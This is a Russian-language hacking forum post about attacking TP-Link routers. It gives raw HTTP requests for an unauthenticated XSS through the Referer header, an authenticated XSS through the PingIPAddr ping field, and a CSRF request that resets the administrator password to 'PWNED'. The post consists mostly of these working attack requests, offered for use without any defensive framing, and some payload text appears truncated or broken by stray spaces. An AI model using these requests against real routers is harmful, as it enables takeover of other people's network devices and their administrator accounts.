1. Do you speak English? Use the English version of the site! Link
    Скрыть объявление
Скрыть объявление
Здравствуй гость! После регистрации на ресурсе, ты сможешь скачивать материалы с форума и участвовать в его жизни! Для регистрации откройте соответствующую форму или нажмите на эту ссылку.

Tp-link взлом | xss уязвимость

Тема в разделе "Статьи", создана пользователем D.Evenjo, 11.10.2015.

  1. D.Evenjo

    D.Evenjo Юзер

    Авг 13 2016 в 18:09
    Регистрация:
    09.09.2015
    Сообщения:
    390
    Симпатии:
    139
    8b4313d9b7d22e178377daad02bfa902.jpg
    1. Отраженная XSS-уязвимость неавторизованных пользователей в поле "Referer" при обращении к несуществующим URL-адресам на роутере.
    Код:
    GET /doesnotexist HTTP/1.1
    Host: 192.168.1.1
    Referer: http://fent">
    Connection: keep-alive

    2. Отраженная XSS-уязвимость но уже для авторизованных пользователей, в одной из диагностических команд - ping - на странице /Forms/tools_test_1 в аргументе PingIPAddr.
    Код:
    Host: <IP>
    Referer: http:///maintenance/tools_test.htm
    Authorization: Basic blablabla==
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded Content-Length: 164 Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3 Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+

    3. CSRF-уязвимость позволяет сбросить пароль администратора. Для атаки создаем HTML-страницу, которая отправляет следующий запрос:
    Код:
    http:///Forms/tools_admin_1 ?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED